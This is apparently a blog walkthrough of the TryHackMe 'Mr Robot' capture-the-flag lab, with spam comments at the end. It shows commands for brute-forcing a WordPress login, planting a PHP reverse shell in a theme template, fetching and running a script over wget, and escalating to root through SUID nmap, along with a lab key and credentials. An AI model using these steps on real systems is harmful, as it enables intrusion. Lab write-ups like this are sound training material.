TryHackMe Mr Robot  CTF Walkthrough

This is my walkthrough for Mr-Robot

About TryHackMe

TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.

About Mr Robot machine

Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.

Scanning

Nmap

nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Enumeration

The open ports I focused on enumerating:

80 tcp
43 tcp

Web server port 80

On visiting the web page I found a website with an animation displayed in reference to the Mr Robot tv series. The animation ends at a screen which resembles a Linux terminal with a blinking cursor.

 

the first thing I do when I’m enumerating a webpage is to check robots.txt.
On checking /robots.txt file, I found an interesting wordlist and key file.


fsocity.dic and key-1-of-3.txt

inputting key-1-of-3.txt in the URL, I got my 1st key:
073403c8a58a1f80d943455fb30724b9

I downloaded the “fsocity.dic” wordlist file for later use.

The wordlist has about 858160 lines of words and some of the words have duplicates in the wordlist, I sorted the words:
sort fsocity.dic -u > sort fsocity.dic

After looking around I could not find any useful thing on the site I decided to use Gobuster to enumerate the web directory.

Web Directory Enumeration

gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403

Gobuster gave me more directories, observing the directory list shows that the website runs on WordPress.

.

WordPress Enumeration

I started enumerating the wp pages but could not find anything interesting, so I jump to the login page "/wp-login".

Tried login in with default credentials admin: admin, admin: password, but the login attempts failed. After a long time of enumerating the username, I found Elliot to be a valid user (got that from the Mr Robot television series character Elliot Alderson ).

when I entered a wrong user I get invalid user and wrong pass.

When I entered elliot I got valid user but wrong pass.

 

Remember I downloaded a wordlist earlier, I used it and brute-force password of the username elliot.

Bruteforcing user (elliot)

Using wpscan and the wordlist I found earlier, I got the login creds :

wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic

Elliot
ER28-0652

 

Reverse shell

I was able to log into wp-admin using the creds I found.

Using WordPress admin privilege which the user “elliot” has, we can get a reverse shell:

WordPress: Reverse Shell

steps for resetting WordPress reverse shell:

  1. goto appearance/editor/ 404 template and replace the php code with php reverse shellYou can get it here:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  2. Edited the following lines of php-reverse-shell.php with my local IP and reverse shell port 443:
    • $ip = '127.0.0.1'; // CHANGE THIS
      $port = 1234; // CHANGE THIS

  3. updated the script (save)
  4. Started ncat listener on my system with same port here as I specified in the script 443
  5. nc -lvp 443
  6. visit the “/404” error page to trigger the reverse shell. “http://10.10.104.75/404.php

I got limited shell as Daemon:

Spawn a TTY Shell

upgraded my shell to tty shell, this will enable me to interact more with the shell:

python3 -c “import pty; pty.spawn(‘/bin/sh’)”;

export TERM=xterm

 

Daemon shell does not have the privilege to access all the directories and files but can navigate some of the file systems. I moved to /home/ directory, found another directory for the user robot.  Robot, directory has 2 files.

One is the 2nd key, the other file is an md5 password hash for the user robot.

Daemon does not have read permission for key-2-of-3.txt, I can only read the key as Robot. However, I have read permission for the password.raw-md5 file, I cat the password file and got robot password md5 hash string. I cracked it on https://crackstation.net/ and obtained the password for the user robot.

User Robot

Using the password I obtain from the has I successfully logged in as robot and got the 2nd flag:
su robot and input password

 

Root Shell

The first thing I do when enumerating a machine for root shell is to check things I can do using sudo -l.
I tried sudo -l , with no luck, I can’t run any sudo cmd.

Privilege Escalation Script

Using python server I was able to transfer lse.sh a Linux privilege escalation script to the machine.

steps I used for that:

  1. I cd into the dir where my lse.sh script is, run python -m SimpleHTTPServer 8000 on my machine to start the python server.
  2. On Mr robot machine, I cd into /tmp directory and run wget 10. * . * . * :8000/lse.sh (http://IP:8000/les.sh).
  3. chmod +x lse.sh
  4. run ./lse.sh

After enumerating with lse.sh, from the result I found Nmap running as SUID in the machine, that’s interesting.

Checking gtfobins we can see how to leverage on nmap to get root.

I ran the commands and got a root shell

  • nmap --interactive
  • !sh

 

As root, I can move into any directory or run any command without restrictions.

I moved to /root/ directory and obtained the 3rd key

This is the end.

Thanks for reading this write-up. Stay tuned and follow me on twitter to receive updates on more write-ups and thoughts on information security concepts.

4
Leave a Reply

avatar
4 Comment threads
0 Thread replies
1 Followers
 
Most reacted comment
Hottest comment thread
2 Comment authors
Hannah FlackPutinVictoria Tegg Recent comment authors
  Subscribe  
newest oldest most voted
Notify of
Victoria Tegg
Guest

“Attractive section of content. I just stumbled upon your
site and in accession capital to assert that I acquire in fact enjoyed account your
blog posts. Anyway I will be subscribing to your augment
and even I achievement you access consistently fast.”

Putin
Guest

I got this website from my pal who told me concerning this website and at the
the moment this time I am browsing this web site and reading very informative articles at this place.

Hannah Flack
Guest

“I like the helpful info you provide in your articles. I’ll bookmark
your blog and check again here frequently. I am quite sure I’ll learn lots of
new stuff right here! Good luck for the next!”

Hannah Flack
Guest

“Good post. I learn something new and challenging on websites I stumbleupon every day.

It will always be interesting to read through articles from other writers and use a
little something from other websites.”